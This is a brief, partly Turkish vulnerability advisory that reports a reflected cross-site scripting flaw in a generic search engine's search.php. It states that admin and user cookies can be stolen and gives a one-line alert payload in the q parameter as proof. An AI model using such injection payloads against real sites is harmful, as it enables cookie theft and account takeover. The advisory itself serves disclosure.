< ------------------- header data start ------------------- >

#############################################################

# Application Name : Search Engine

# Vulnerable Type : Cross Site Scripting

# Infection : Yönetici ve User cookieleri çalinabilir.

# Bug Fix Advice : Zararli kodlar filtrelenmelidir.

# author : code Hunters TIM

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/search.php?action=search&q=><SCRIPT>alert(String.fromCharcode(88,83,83))</SCRIPT>

< -- bug code end of -- >